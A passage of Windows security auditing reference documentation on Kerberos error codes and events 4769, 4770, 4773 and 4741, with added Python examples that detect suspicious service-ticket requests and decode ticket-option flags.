KDC_ERR_TGT_REVOKED.
See RFC1510 for more
details.

0x15 KDC_ERR_CLIENT_NOTYET Client not yet valid—try No information.


again later

0x16 KDC_ERR_SERVICE_NOTYET Server not yet valid—try No information.


again later

0x17 KDC_ERR_KEY_EXPIRED Password has expired— The user’s password has


change password to reset expired.
This error code cannot occur
in event “4768. A Kerberos
authentication ticket (TGT)
was requested”. It occurs in
“4771. Kerberos pre-
authentication failed” event.

0x18 KDC_ERR_PREAUTH_FAILED Pre-authentication The wrong password was


information was invalid provided.
This error code cannot occur
in event “4768. A Kerberos
authentication ticket (TGT)
was requested”. It occurs in
“4771. Kerberos pre-
authentication failed” event.

0x19 KDC_ERR_PREAUTH_REQUIR Additional pre- This error often occurs in


ED authentication required UNIX interoperability
scenarios. MIT-Kerberos
clients do not request pre-
authentication when they
send a KRB_AS_REQ
message. If pre-
authentication is required
(the default), Windows
systems will send this error.
Most MIT-Kerberos clients
will respond to this error by
giving the pre-
authentication, in which case
the error can be ignored,
but some clients might not
respond in this way.

0x1A KDC_ERR_SERVER_NOMATC KDC does not know about No information.


H the requested server
CODE CODE NAME DESCRIPTION POSSIBLE CAUSES

0x1B KDC_ERR_MUST_USE_USER2 Server principal valid for This error occurs because
USER user2user only the service is missing an
SPN.

0x1F KRB_AP_ERR_BAD_INTEGRIT Integrity check on The authenticator was


Y decrypted field failed encrypted with something
other than the session key.
The result is that the client
cannot decrypt the resulting
message. The modification
of the message could be the
result of an attack or it could
be because of network
noise.

0x20 KRB_AP_ERR_TKT_EXPIRED The ticket has expired The smaller the value for the
“Maximum lifetime for user
ticket” Kerberos policy
setting, the more likely it is
that this error will occur.
Because ticket renewal is
automatic, you should not
have to do anything if you
get this message.

0x21 KRB_AP_ERR_TKT_NYV The ticket is not yet valid The ticket presented to the
server is not yet valid (in
relationship to the server
time). The most probable
cause is that the clocks on
the KDC and the client are
not synchronized.
If cross-realm Kerberos
authentication is being
attempted, then you should
verify time synchronization
between the KDC in the
target realm and the KDC in
the client realm, as well.

0x22 KRB_AP_ERR_REPEAT The request is a replay This error indicates that a


specific authenticator
showed up twice — the KDC
has detected that this
session ticket duplicates one
that it has already received.

0x23 KRB_AP_ERR_NOT_US The ticket is not for us The server has received a
ticket that was meant for a
different realm.

0x24 KRB_AP_ERR_BADMATCH The ticket and authenticator The KRB_TGS_REQ is being


do not match sent to the wrong KDC.
There is an account
mismatch during protocol
transition.
CODE CODE NAME DESCRIPTION POSSIBLE CAUSES

0x25 KRB_AP_ERR_SKEW The clock skew is too great This error is logged if a client
computer sends a
timestamp whose value
differs from that of the
server’s timestamp by more
than the number of minutes
found in the “Maximum
tolerance for computer clock
synchronization” setting in
Kerberos policy.

0x26 KRB_AP_ERR_BADADDR Network address in network Session tickets MAY include


layer header doesn't match the addresses from which
address inside ticket they are valid. This error can
occur if the address of the
computer sending the ticket
is different from the valid
address in the ticket. A
possible cause of this could
be an Internet Protocol (IP)
address change. Another
possible cause is when a
ticket is passed through a
proxy server or NAT. The
client is unaware of the
address scheme used by the
proxy server, so unless the
program caused the client to
request a proxy server ticket
with the proxy server's
source address, the ticket
could be invalid.

0x27 KRB_AP_ERR_BADVERSION Protocol version numbers When an application


don't match (PVNO) receives a KRB_SAFE
message, it verifies it. If any
error occurs, an error code is
reported for use by the
application.
The message is first checked
by verifying that the
protocol version and type
fields match the current
version and KRB_SAFE,
respectively. A mismatch
generates a
KRB_AP_ERR_BADVERSION.
See RFC4120 for more
details.
CODE CODE NAME DESCRIPTION POSSIBLE CAUSES

0x28 KRB_AP_ERR_MSG_TYPE Message type is This message is generated


unsupported when target server finds
that message format is
wrong. This applies to
KRB_AP_REQ, KRB_SAFE,
KRB_PRIV and KRB_CRED
messages.
This error also generated if
use of UDP protocol is being
attempted with User-to-
User authentication.

0x29 KRB_AP_ERR_MODIFIED Message stream modified The authentication data was


and checksum didn't match encrypted with the wrong
key for the intended server.
The authentication data was
modified in transit by a
hardware or software error,
or by an attacker.
The client sent the
authentication data to the
wrong server because
incorrect DNS data caused
the client to send the
request to the wrong server.
The client sent the
authentication data to the
wrong server because DNS
data was out-of-date on the
client.

0x2A KRB_AP_ERR_BADORDER Message out of order This event generates for


(possible tampering) KRB_SAFE and KRB_PRIV
messages if an incorrect
sequence number is
included, or if a sequence
number is expected but not
present. See RFC4120 for
more details.

0x2C KRB_AP_ERR_BADKEYVER Specified version of key is This error might be


not available generated on server side
during receipt of invalid
KRB_AP_REQ message. If the
key version indicated by the
Ticket in the KRB_AP_REQ is
not one the server can use
(e.g., it indicates an old key,
and the server no longer
possesses a copy of the old
key), the
KRB_AP_ERR_BADKEYVER
error is returned.
CODE CODE NAME DESCRIPTION POSSIBLE CAUSES

0x2D KRB_AP_ERR_NOKEY Service key not available This error might be


generated on server side
during receipt of invalid
KRB_AP_REQ message.
Because it is possible for the
server to be registered in
multiple realms, with
different keys in each, the
realm field in the
unencrypted portion of the
ticket in the KRB_AP_REQ is
used to specify which secret
key the server should use to
decrypt that ticket. The
KRB_AP_ERR_NOKEY error
code is returned if the server
doesn't have the proper key
to decipher the ticket.

0x2E KRB_AP_ERR_MUT_FAIL Mutual authentication failed No information.

0x2F KRB_AP_ERR_BADDIRECTIO Incorrect message direction No information.


N

0x30 KRB_AP_ERR_METHOD Alternative authentication According RFC4120 this


method required error message is obsolete.

0x31 KRB_AP_ERR_BADSEQ Incorrect sequence number No information.


in message

0x32 KRB_AP_ERR_INAPP_CKSUM Inappropriate type of When KDC receives


checksum in message KRB_TGS_REQ message it
(checksum may be decrypts it, and after the
unsupported) user-supplied checksum in
the Authenticator MUST be
verified against the contents
of the request, and the
message MUST be rejected if
the checksums do not
match (with an error code of
KRB_AP_ERR_MODIFIED) or
if the checksum is not
collision-proof (with an error
code of
KRB_AP_ERR_INAPP_CKSUM
).

0x33 KRB_AP_PATH_NOT_ACCEPT Desired path is unreachable No information.


ED
CODE CODE NAME DESCRIPTION POSSIBLE CAUSES

0x34 KRB_ERR_RESPONSE_TOO_B Too much data The size of a ticket is too


IG large to be transmitted
reliably via UDP. In a
Windows environment, this
message is purely
informational. A computer
running a Windows
operating system will
automatically try TCP if UDP
fails.

0x3C KRB_ERR_GENERIC Generic error Group membership has


overloaded the PAC.
Multiple recent password
changes have not
propagated.
Crypto subsystem error
caused by running out of
memory.
SPN too long.
SPN has too many parts.

0x3D KRB_ERR_FIELD_TOOLONG Field is too long for this Each request


implementation (KRB_KDC_REQ) and
response (KRB_KDC_REP or
KRB_ERROR) sent over the
TCP stream is preceded by
the length of the request as
4 octets in network byte
order. The high bit of the
length is reserved for future
expansion and MUST
currently be set to zero. If a
KDC that does not
understand how to interpret
a set high bit of the length
encoding receives a request
with the high order bit of
the length set, it MUST
return a KRB-ERROR
message with the error
KRB_ERR_FIELD_TOOLONG
and MUST close the TCP
stream.

0x3E KDC_ERR_CLIENT_NOT_TRU The client trust failed or is This typically happens when
STED not implemented user’s smart-card certificate
is revoked or the root
Certification Authority that
issued the smart card
certificate (in a chain) is not
trusted by the domain
controller.
CODE CODE NAME DESCRIPTION POSSIBLE CAUSES

0x3F KDC_ERR_KDC_NOT_TRUSTE The KDC server trust failed The trustedCertifiers field
D or could not be verified contains a list of certification
authorities trusted by the
client, in the case that the
client does not possess the
KDC's public key certificate.
If the KDC has no certificate
signed by any of the
trustedCertifiers, then it
returns an error of type
KDC_ERR_KDC_NOT_TRUSTE
D. See RFC1510 for more
details.

0x40 KDC_ERR_INVALID_SIG The signature is invalid This error is related to


PKINIT. If a PKI trust
relationship exists, the KDC
then verifies the client's
signature on AuthPack (TGT
request signature). If that
fails, the KDC returns an
error message of type
KDC_ERR_INVALID_SIG.

0x41 KDC_ERR_KEY_TOO_WEAK A higher encryption level is If the clientPublicValue field


needed is filled in, indicating that the
client wishes to use Diffie-
Hellman key agreement,
then the KDC checks to see
that the parameters satisfy
its policy. If they do not (e.g.,
the prime size is insufficient
for the expected encryption
type), then the KDC sends
back an error message of
type
KDC_ERR_KEY_TOO_WEAK.

0x42 KRB_AP_ERR_USER_TO_USE User-to-user authorization In the case that the client


R_REQUIRED is required application doesn't know
that a service requires user-
to-user authentication, and
requests and receives a
conventional KRB_AP_REP,
the client will send the
KRB_AP_REP request, and
the server will respond with
a KRB_ERROR token as
described in RFC1964, with
a msg-type of
KRB_AP_ERR_USER_TO_USER
_REQUIRED.

0x43 KRB_AP_ERR_NO_TGT No TGT was presented or In user-to-user


available authentication if the service
does not possess a ticket
granting ticket, it should
return the error
KRB_AP_ERR_NO_TGT.
CODE CODE NAME DESCRIPTION POSSIBLE CAUSES

0x44 KDC_ERR_WRONG_REALM Incorrect domain or Although this error rarely


principal occurs, it occurs when a
client presents a cross-realm
TGT to a realm other than
the one specified in the TGT.
Typically, this results from
incorrectly configured DNS.

Transited Services [Type = UnicodeString]: this field contains the list of SPNs which were requested if Kerberos delegation was used.

Note Service Principal Name (SPN) is the name by which a client uniquely identifies an instance of a service. If you install multiple instances of a service on computers throughout a forest, each instance must have its own SPN. A given service instance can have multiple SPNs if there are multiple names that clients might use for authentication. For example, an SPN always includes the name of the host computer on which the service instance is running, so a service instance might register an SPN for each name or alias of its host.

Security Monitoring Recommendations

For 4769(S, F): A Kerberos service ticket was requested.

TYPE OF MONITORING REQUIRED / RECOMMENDATION

High-value accounts: You might have high-value domain or local accounts for which you need to monitor each action. Examples of high-value accounts are database administrators, built-in local administrator account, domain administrators, service accounts, domain controller accounts and so on.
Recommendation: Monitor this event with the "Account Information\Account Name" that corresponds to the high-value account or accounts.

Anomalies or malicious actions: You might have specific requirements for detecting anomalies or monitoring potential malicious actions. For example, you might need to monitor for use of an account outside of working hours.
Recommendation: When you monitor for anomalies or malicious actions, use the "Account Information\Account Name" (with other information) to monitor how or when a particular account is being used.

Non-active accounts: You might have non-active, disabled, or guest accounts, or other accounts that should never be used.
Recommendation: Monitor this event with the "Account Information\Account Name" that corresponds to the accounts that should never be used.

External accounts: You might be monitoring accounts from another domain, or "external" accounts that are not allowed to perform certain actions (represented by certain specific events).
Recommendation: Monitor this event for the "Account Information\Account Domain" corresponding to another domain or "external" location.

Restricted-use computers or devices: You might have certain computers, machines, or devices on which certain people (accounts) should not typically perform any actions.
Recommendation: Monitor the target Computer: (or other target device) for actions performed by the "Account Information\Account Name" that you are concerned about.

Account naming conventions: Your organization might have specific naming conventions for account names.
Recommendation: Monitor "User ID" for names that don't comply with naming conventions.

If you know that Account Name should never request any tickets for (that is, never get access to) a particular computer account or service account, monitor for 4769 events with the corresponding Account Name and Service ID fields.

You can track all 4769 events where the Client Address is not from your internal IP range or not from private IP ranges.

If you know that Account Name should be able to request tickets (should be used) only from a known whitelist of IP addresses, track all Client Address values for this Account Name in 4769 events. If Client Address is not from your whitelist of IP addresses, generate the alert.

All Client Address = ::1 means local TGS requests, which means that the Account Name logged on to a domain controller before making the TGS request. If you have a whitelist of accounts allowed to log on to domain controllers, monitor events with Client Address = ::1 and any Account Name outside the whitelist.

All 4769 events with Client Port field value > 0 and < 1024 should be examined, because a well-known port was used for the outbound connection.

Monitor for a Ticket Encryption Type of 0x1 or 0x3, which means the DES algorithm was used. DES should not be in use, because of low security and known vulnerabilities. It is disabled by default starting from Windows 7 and Windows Server 2008 R2.

Starting with Windows Vista and Windows Server 2008, monitor for a Ticket Encryption Type other than 0x11 and 0x12. These are the expected values, starting with these operating systems, and represent AES-family algorithms.

If you have a list of important Failure Codes, monitor for these codes.
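The recommendations above are easier to judge when applied to actual records. The following is an added example, not code from the Microsoft page: it parses 4769 records in the Event XML layout shown on this page and applies the checks listed above (DES or non-AES encryption type, client address outside internal ranges, a ::1 request by an account not allowed to log on to a domain controller, a well-known source port, and failure codes of interest). The sample events, the internal address ranges, the DC-logon allow list, the chosen failure codes and the ServiceSid/LogonGuid values are all constructed assumptions for this demo.

```python
import ipaddress
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Encryption types from the Ticket Encryption Type table: DES must not be seen,
# AES (0x11/0x12) is what Windows Vista / Server 2008 and later are expected to use.
DES_ETYPES = {0x1, 0x3}
AES_ETYPES = {0x11, 0x12}

# Site policy for this example (constructed assumptions, not from the page).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
DC_LOGON_ALLOWLIST = {"dadmin@CONTOSO.LOCAL", "DC01$@CONTOSO.LOCAL"}
FAILURE_CODES_OF_INTEREST = {          # subset of the failure code table above
    0x06: "KDC_ERR_C_PRINCIPAL_UNKNOWN",
    0x12: "KDC_ERR_CLIENT_REVOKED",
    0x1F: "KRB_AP_ERR_BAD_INTEGRITY",
    0x22: "KRB_AP_ERR_REPEAT",
    0x25: "KRB_AP_ERR_SKEW",
}

def sample_4769(**overrides):
    """Builds one 4769 record in the Event XML layout used on this page (constructed sample data)."""
    data = {
        "TargetUserName": "dadmin@CONTOSO.LOCAL", "TargetDomainName": "CONTOSO.LOCAL",
        "ServiceName": "WIN2008R2$", "ServiceSid": "S-1-5-21-3457937927-2839227994-823803824-2102",
        "TicketOptions": "0x40810000", "TicketEncryptionType": "0x12",
        "IpAddress": "::ffff:10.0.0.12", "IpPort": "49273", "Status": "0x0",
        "LogonGuid": "{00000000-0000-0000-0000-000000000000}", "TransmittedServices": "-",
    }
    data.update(overrides)
    body = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>4769</EventID>'
            f'<Channel>Security</Channel><Computer>DC01.contoso.local</Computer></System>'
            f'<EventData>{body}</EventData></Event>')

def parse_event(xml_text):
    """Flattens EventData into a dict keyed by the Data Name attribute."""
    root = ET.fromstring(xml_text)
    fields = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", NS)}
    fields["EventID"] = int(root.find("e:System/e:EventID", NS).text)
    return fields

def normalise_ip(raw):
    """'::ffff:10.0.0.12' -> IPv4Address('10.0.0.12'); '::1' stays the IPv6 loopback."""
    addr = ipaddress.ip_address(raw)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        return addr.ipv4_mapped
    return addr

def check_4769(ev):
    """Returns a list of (rule, detail) findings for one parsed 4769 record."""
    if ev["EventID"] != 4769:
        return []
    findings = []
    account = ev["TargetUserName"]
    etype = int(ev["TicketEncryptionType"], 16)
    status = int(ev["Status"], 16)
    port = int(ev["IpPort"])
    addr = normalise_ip(ev["IpAddress"])

    # Failures carry etype 0xFFFFFFFF, so the cipher checks only apply to successes.
    if status != 0:
        name = FAILURE_CODES_OF_INTEREST.get(status)
        if name:
            findings.append(("FAILURE_CODE", f"{account}: {status:#x} {name}"))
    elif etype in DES_ETYPES:
        findings.append(("DES_ETYPE", f"{account}: {etype:#x}"))
    elif etype not in AES_ETYPES:
        findings.append(("NON_AES_ETYPE", f"{account}: {etype:#x}"))

    if addr.is_loopback:
        # ::1 means the account logged on to the domain controller itself first.
        if account not in DC_LOGON_ALLOWLIST:
            findings.append(("DC_LOCAL_REQUEST", account))
    elif not any(addr in net for net in INTERNAL_NETS):
        findings.append(("EXTERNAL_CLIENT", f"{account} from {addr}"))

    if 0 < port < 1024:
        findings.append(("WELL_KNOWN_SOURCE_PORT", f"{account} from port {port}"))
    return findings

SAMPLE_EVENTS = [  # constructed records, one per check
    sample_4769(),                                                                       # clean
    sample_4769(TargetUserName="svc_sql@CONTOSO.LOCAL", TicketEncryptionType="0x17"),    # RC4, not AES
    sample_4769(TargetUserName="guest@CONTOSO.LOCAL", IpAddress="::ffff:203.0.113.7"),   # outside internal ranges
    sample_4769(TargetUserName="WIN81$@CONTOSO.LOCAL", IpAddress="::1", IpPort="0"),     # local request, not allow-listed
    sample_4769(TicketEncryptionType="0x1", IpPort="445"),                               # DES and a well-known port
    sample_4769(TargetUserName="nobody@CONTOSO.LOCAL", TicketEncryptionType="0xffffffff", Status="0x6"),  # failure
]

def analyse(events=SAMPLE_EVENTS):
    return [check_4769(parse_event(e)) for e in events]

if __name__ == "__main__":
    for i, findings in enumerate(analyse()):
        print(i, findings or "ok")
```

On a real domain controller the same check_4769() can be fed records exported from the Security log (for example the XML produced by wevtutil or Get-WinEvent), since only the EventData names are relied on.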
4770(S): A Kerberos service ticket was renewed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Kerberos Service Ticket Operations
Event Description:
This event generates for every Ticket Granting Service (TGS) ticket renewal.
This event generates only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.
Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4770</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>14337</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-07T03:26:23.466552900Z" />
<EventRecordID>166481</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1084" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="TargetUserName">WIN2008R2$@CONTOSO.LOCAL</Data>
<Data Name="TargetDomainName">CONTOSO.LOCAL</Data>
<Data Name="ServiceName">krbtgt</Data>
<Data Name="ServiceSid">S-1-5-21-3457937927-2839227994-823803824-502</Data>
<Data Name="TicketOptions">0x2</Data>
<Data Name="TicketEncryptionType">0x12</Data>
<Data Name="IpAddress">::ffff:10.0.0.12</Data>
<Data Name="IpPort">49964</Data>
</EventData>
</Event>

Required Server Roles: Active Directory domain controller.
Minimum OS Version: Windows Server 2008.
Event Versions: 0.
Field Descriptions:
Account Information:
Account Name [Type = UnicodeString]: the User Principal Name (UPN) of the account that requested ticket renewal. A computer account name ends with the $ character in the UPN. This field typically has the following value format: user_account_name@FULL_DOMAIN_NAME.
User account example: dadmin@CONTOSO.LOCAL
Computer account example: WIN81$@CONTOSO.LOCAL
This parameter in this event is optional and can be empty in some cases.
Account Domain [Type = UnicodeString]: the name of the Kerberos Realm that Account Name belongs
to. This can appear in a variety of formats, including the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
This parameter in this event is optional and can be empty in some cases.
Service Information:
Service Name [Type = UnicodeString]: the name of the account or computer for which the TGS ticket was
renewed.
This parameter in this event is optional and can be empty in some cases.
Service ID [Type = SID]: SID of the account or computer object for which the TGS ticket was renewed. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Network Information:
Client Address [Type = UnicodeString]: IP address of the computer from which the TGS renewal request
was received. Formats vary, and include the following:
IPv6 or IPv4 address.
::ffff:IPv4_address.
::1 - localhost.
Client Port [Type = UnicodeString]: source port number of the client network connection (TGS renewal request connection).
0 for local (localhost) requests.
Additional information:
Ticket Options: [Type = HexInt32]: this is a set of different Ticket Flags in hexadecimal format.
Example:
Ticket Options: 0x40810010
Binary view: 01000000100000010000000000010000
Using MSB 0 bit numbering we have bit 1, 8, 15 and 27 set = Forwardable, Renewable, Canonicalize,
Renewable-ok.

Note In the table below “MSB 0” bit numbering is used, because RFC documents use this style. In “MSB 0”
style bit numbering begins from left.

The most common values:
0x40810010 - Forwardable, Renewable, Canonicalize, Renewable-ok
0x40810000 - Forwardable, Renewable, Canonicalize
0x60810010 - Forwardable, Forwarded, Renewable, Canonicalize, Renewable-ok
BIT / FLAG NAME / DESCRIPTION

Bit 0, Reserved: -

Bit 1, Forwardable: (TGT only). Tells the ticket-granting service that it can issue a new TGT, based on the presented TGT, with a different network address.

Bit 2, Forwarded: Indicates either that a TGT has been forwarded or that a ticket was issued from a forwarded TGT.

Bit 3, Proxiable: (TGT only). Tells the ticket-granting service that it can issue tickets with a network address that differs from the one in the TGT.

Bit 4, Proxy: Indicates that the network address in the ticket is different from the one in the TGT used to obtain the ticket.

Bit 5, Allow-postdate: Postdated tickets SHOULD NOT be supported in KILE (Microsoft Kerberos Protocol Extension).

Bit 6, Postdated: Postdated tickets SHOULD NOT be supported in KILE (Microsoft Kerberos Protocol Extension).

Bit 7, Invalid: This flag indicates that a ticket is invalid, and it must be validated by the KDC before use. Application servers must reject tickets which have this flag set.

Bit 8, Renewable: Used in combination with the End Time and Renew Till fields to cause tickets with long life spans to be renewed at the KDC periodically.

Bit 9, Initial: Indicates that a ticket was issued using the authentication service (AS) exchange and not issued based on a TGT.

Bit 10, Pre-authent: Indicates that the client was authenticated by the KDC before a ticket was issued. This flag usually indicates the presence of an authenticator in the ticket. It can also flag the presence of credentials taken from a smart card logon.

Bit 11, Opt-hardware-auth: This flag was originally intended to indicate that hardware-supported authentication was used during pre-authentication. This flag is no longer recommended in the Kerberos V5 protocol. KDCs MUST NOT issue a ticket with this flag set. KDCs SHOULD NOT preserve this flag if it is set by another KDC.

Bit 12, Transited-policy-checked: KILE MUST NOT check for transited domains on servers or a KDC. Application servers MUST ignore the TRANSITED-POLICY-CHECKED flag.

Bit 13, Ok-as-delegate: The KDC MUST set the OK-AS-DELEGATE flag if the service account is trusted for delegation.

Bit 14, Request-anonymous: KILE does not use this flag.

Bit 15, Name-canonicalize: In order to request referrals the Kerberos client MUST explicitly request the "canonicalize" KDC option for the AS-REQ or TGS-REQ.

Bits 16-25, Unused: -

Bit 26, Disable-transited-check: By default the KDC will check the transited field of a TGT against the policy of the local realm before it will issue derivative tickets based on the TGT. If this flag is set in the request, checking of the transited field is disabled. Tickets issued without the performance of this check will be noted by the reset (0) value of the TRANSITED-POLICY-CHECKED flag, indicating to the application server that the transited field must be checked locally. KDCs are encouraged but not required to honor the DISABLE-TRANSITED-CHECK option. Should not be in use, because the Transited-policy-checked flag is not supported by KILE.

Bit 27, Renewable-ok: The RENEWABLE-OK option indicates that a renewable ticket will be acceptable if a ticket with the requested life cannot otherwise be provided, in which case a renewable ticket may be issued with a renew-till equal to the requested end time. The value of the renew-till field may still be limited by local limits, or limits selected by the individual principal or server.

Bit 28, Enc-tkt-in-skey: No information. (In RFC 4120 this KDC option requests a user-to-user ticket, encrypted in the session key of the additional TGT supplied in the request.)

Bit 29, Unused: -

Bit 30, Renew: The RENEW option indicates that the present request is for a renewal. The ticket provided is encrypted in the secret key for the server on which it is valid. This option will only be honored if the ticket to be renewed has its RENEWABLE flag set and if the time in its renew-till field has not passed. The ticket to be renewed is passed in the padata field as part of the authentication header.

Bit 31, Validate: This option is used only by the ticket-granting service. The VALIDATE option indicates that the request is to validate a postdated ticket. Should not be in use, because postdated tickets are not supported by KILE.
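The table numbers bits in "MSB 0" style, which is the usual source of mistakes when people build filters on the Ticket Options field. The following added example (not code from the Microsoft page) decodes and encodes Ticket Options words using that numbering, reproduces the 0x40810010 example above, and includes a deliberately naive LSB 0 decoder so the difference is visible. The flag names are taken from the table; nothing else is assumed.

```python
# Flag names by MSB 0 bit position, as in the table above. Bits 16-25 and 29 are unused.
TICKET_FLAGS = {
    0: "Reserved", 1: "Forwardable", 2: "Forwarded", 3: "Proxiable", 4: "Proxy",
    5: "Allow-postdate", 6: "Postdated", 7: "Invalid", 8: "Renewable", 9: "Initial",
    10: "Pre-authent", 11: "Opt-hardware-auth", 12: "Transited-policy-checked",
    13: "Ok-as-delegate", 14: "Request-anonymous", 15: "Name-canonicalize",
    26: "Disable-transited-check", 27: "Renewable-ok", 28: "Enc-tkt-in-skey",
    30: "Renew", 31: "Validate",
}
BIT_BY_NAME = {name: bit for bit, name in TICKET_FLAGS.items()}

def msb0_mask(bit):
    """MSB 0 numbering counts from the left: bit 0 is 0x80000000, bit 31 is 0x1."""
    return 1 << (31 - bit)

def decode_ticket_options(value):
    """Splits a 32-bit Ticket Options word into (known flag names, unknown set bit numbers)."""
    names, unknown = [], []
    for bit in range(32):
        if value & msb0_mask(bit):
            if bit in TICKET_FLAGS:
                names.append(TICKET_FLAGS[bit])
            else:
                unknown.append(bit)      # reserved/unused bit set: worth a second look
    return names, unknown

def encode_ticket_options(names):
    """Builds the word for a set of flag names, e.g. to compare against TicketOptions in a filter."""
    value = 0
    for name in names:
        value |= msb0_mask(BIT_BY_NAME[name])
    return value

def has_flag(value, name):
    return bool(value & msb0_mask(BIT_BY_NAME[name]))

def decode_lsb0_naive(value):
    """Deliberately wrong: reads the table's bit numbers as LSB 0 (1 << bit).
    Included only to show what a mis-numbered decoder reports for the same word."""
    return [TICKET_FLAGS[bit] for bit in range(32) if value & (1 << bit) and bit in TICKET_FLAGS]

if __name__ == "__main__":
    for word in (0x40810010, 0x40810000, 0x60810010):
        print(f"{word:#010x}: {decode_ticket_options(word)[0]}  naive LSB 0 reading: {decode_lsb0_naive(word)}")
```

For 0x40810010 the correct decoder yields Forwardable, Renewable, Name-canonicalize (called "Canonicalize" in the examples above) and Renewable-ok, while the LSB 0 reading of the same word reports Proxy and Renew, flags that are not set at all.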

Ticket Encryption Type: [Type = HexInt32]: the cryptographic suite that was used in the renewed TGS.

TYPE / TYPE NAME / DESCRIPTION

0x1, DES-CBC-CRC: Disabled by default starting from Windows 7 and Windows Server 2008 R2.

0x3, DES-CBC-MD5: Disabled by default starting from Windows 7 and Windows Server 2008 R2.

0x11, AES128-CTS-HMAC-SHA1-96: Supported starting from Windows Server 2008 and Windows Vista.

0x12, AES256-CTS-HMAC-SHA1-96: Supported starting from Windows Server 2008 and Windows Vista.

0x17, RC4-HMAC: Default suite for operating systems before Windows Server 2008 and Windows Vista.

0x18, RC4-HMAC-EXP: Default suite for operating systems before Windows Server 2008 and Windows Vista.

0xFFFFFFFF or 0xffffffff: This type shows in Audit Failure events.

Security Monitoring Recommendations

For 4770(S): A Kerberos service ticket was renewed.
This event typically has an informational-only purpose.
4773(F): A Kerberos service ticket request failed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Currently this event doesn't generate. It is a defined event, but it is never invoked by the operating system. The 4769 failure event is generated instead.
Subcategory: Audit Kerberos Service Ticket Operations
Audit Other Account Logon Events
4/5/2019

Applies to
Windows 10
Windows Server 2016
General Subcategory Information:
This auditing subcategory does not contain any events. It is intended for future use.

COMPUTER TYPE       GENERAL SUCCESS   GENERAL FAILURE   STRONGER SUCCESS   STRONGER FAILURE
Domain Controller   No                No                No                 No
Member Server       No                No                No                 No
Workstation         No                No                No                 No

Comments (all computer types): This auditing subcategory does not contain any events. It is intended for future use, and there is no reason to enable it.
Audit Application Group Management
4/5/2019

Applies to
Windows 10
Windows Server 2016
Audit Application Group Management generates events for actions related to application groups, such as group
creation, modification, addition or removal of group member and some other actions.
Application groups are used by Authorization Manager.
Audit Application Group Management subcategory is out of scope of this document, because Authorization
Manager is very rarely in use and it is deprecated starting from Windows Server 2012.

COMPUTER TYPE       GENERAL SUCCESS   GENERAL FAILURE   STRONGER SUCCESS   STRONGER FAILURE
Domain Controller   -                 -                 -                  -
Member Server       -                 -                 -                  -
Workstation         -                 -                 -                  -

Comments (all computer types): This subcategory is outside the scope of this document.

4783(S): A basic application group was created.
4784(S): A basic application group was changed.
4785(S): A member was added to a basic application group.
4786(S): A member was removed from a basic application group.
4787(S): A non-member was added to a basic application group.
4788(S): A non-member was removed from a basic application group.
4789(S): A basic application group was deleted.
4790(S): An LDAP query group was created.
4791(S): An LDAP query group was changed.
4792(S): An LDAP query group was deleted.
Audit Computer Account Management
4/5/2019

Applies to
Windows 10
Windows Server 2016
Audit Computer Account Management determines whether the operating system generates audit events when a
computer account is created, changed, or deleted.
This policy setting is useful for tracking account-related changes to computers that are members of a domain.
Event volume: Low on domain controllers.
This subcategory allows you to audit events generated by changes to computer accounts such as when a
computer account is created, changed, or deleted.

COMPUTER TYPE       GENERAL SUCCESS   GENERAL FAILURE   STRONGER SUCCESS   STRONGER FAILURE
Domain Controller   Yes               No                Yes                No
Member Server       No                No                No                 No
Workstation         No                No                No                 No

Comments, Domain Controller: We recommend monitoring changes to critical computer objects in Active Directory, such as domain controllers, administrative workstations, and critical servers. It's especially important to be informed if any critical computer account objects are deleted. Additionally, events in this subcategory will give you information about who deleted, created, or modified a computer object, and when the action was taken. Typically the volume of these events is low on domain controllers. This subcategory doesn't have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.

Comments, Member Server: This subcategory generates events only on domain controllers.

Comments, Workstation: This subcategory generates events only on domain controllers.

Events List:
4741(S): A computer account was created.
4742(S): A computer account was changed.
4743(S): A computer account was deleted.
4741(S): A computer account was created.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Computer Account Management
Event Description:
This event generates every time a new computer object is created.
This event generates only on domain controllers.

Note For recommendations, see Security Monitoring Recommendations for this event.
Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4741</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13825</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-08-12T18:41:39.201898100Z" />
<EventRecordID>170254</EventRecordID>
<Correlation />
<Execution ProcessID="520" ThreadID="1096" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="TargetUserName">WIN81$</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
